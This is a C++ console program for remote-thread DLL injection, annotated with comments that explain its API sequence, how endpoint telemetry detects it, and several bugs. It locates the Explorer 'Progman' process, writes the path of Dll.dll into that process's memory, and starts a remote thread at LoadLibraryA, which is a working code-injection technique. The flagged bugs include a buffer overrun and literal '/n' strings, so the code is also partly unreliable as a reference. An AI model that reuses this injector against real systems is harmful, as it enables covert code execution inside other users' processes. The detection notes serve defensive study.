// DLL injection system; the injected file is named Dll.dll.
// This text is for research only and must not be used for illegal purposes; the consequences are your own.
// RemoteThreadDll.cpp : Defines the entry point for the console application.
//
// What this program does, as written: it builds a path to Dll.dll under its own
// current directory, locates the process owning the "Progman" window, opens it
// with PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, copies the
// path into the target with VirtualAllocEx + WriteProcessMemory, and starts a
// remote thread at kernel32!LoadLibraryA with that buffer as the argument.
// From a detection standpoint this exact API sequence — a cross-process handle
// with those rights, a remote allocation/write, and a new thread in another
// process whose start address is LoadLibraryA — is the classic observable
// for remote-thread DLL injection and is what endpoint telemetry keys on.
// Command-line arguments are accepted but never read; the target is fixed.
#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>

int main( int argc, char * argv[])
{
    HWND hand;
    HANDLE hProcess;
    HMODULE hmod;
    // Buffer is 256 bytes, but MAX_PATH (260) is passed as the size to
    // GetCurrentDirectory and as the byte count to WriteProcessMemory below,
    // so both calls may touch memory past the end of this array.
    char szMyDllFull[256];
    DWORD dwThreadID=NULL,dwProcessID=NULL ;   // NULL used as an integer initializer for DWORDs
    PDWORD lpLoadLibrary,lpDllName;

    // Build the DLL path from the injector's current directory. As published,
    // the appended separator is the literal "//" and the printf strings contain
    // the literal "/n" rather than an escape sequence.
    GetCurrentDirectory(MAX_PATH,szMyDllFull);
    lstrcat(szMyDllFull, "//Dll.dll" );
    printf ( "%s/n" ,szMyDllFull);

    // Resolve LoadLibraryA in this process; the address is later used as the
    // remote thread's start routine (presumably relying on kernel32 sharing a
    // base address with the target — not checked here).
    hmod=GetModuleHandle( "kernel32.dll" );
    lpLoadLibrary=(PDWORD)GetProcAddress(hmod, "LoadLibraryA" );

    // Target selection: whichever process owns the "Progman" / "Program Manager" window.
    hand=FindWindow( "Progman" , "Program Manager" );
    if (hand==NULL)
    {
        printf ( "找不到 progarm manager/n" );   // "cannot find Program Manager"
        return 0;
    }
    dwThreadID=GetWindowThreadProcessId(hand,&dwProcessID);   // dwThreadID is stored but never used
    // Requested rights are exactly the set needed to write into and start a thread in the target.
    hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID);
    if (hProcess!=NULL)
    {
        // Return values of VirtualAllocEx, WriteProcessMemory and
        // CreateRemoteThread are never checked; a NULL remote buffer or a
        // failed write would still lead to the remote thread being started.
        lpDllName=(PDWORD)VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE);
        printf ( "%x/n" ,lpDllName);   // %x with a pointer argument
        WriteProcessMemory(hProcess,lpDllName,szMyDllFull,MAX_PATH,NULL);
        CreateRemoteThread(hProcess,NULL,0, (LPTHREAD_START_ROUTINE )lpLoadLibrary,lpDllName,0,NULL);
        // lpDllName is an address in the target process, not a HANDLE, so this
        // CloseHandle is a misuse; the thread handle CreateRemoteThread returns
        // is discarded and never closed, and the remote buffer is never freed.
        CloseHandle(lpDllName);
        CloseHandle(hProcess);
        //ExitProcess(NULL);
    }
    else
        printf ( "faile/n" );   // OpenProcess failed (access denied or no such process)
    return 0;
}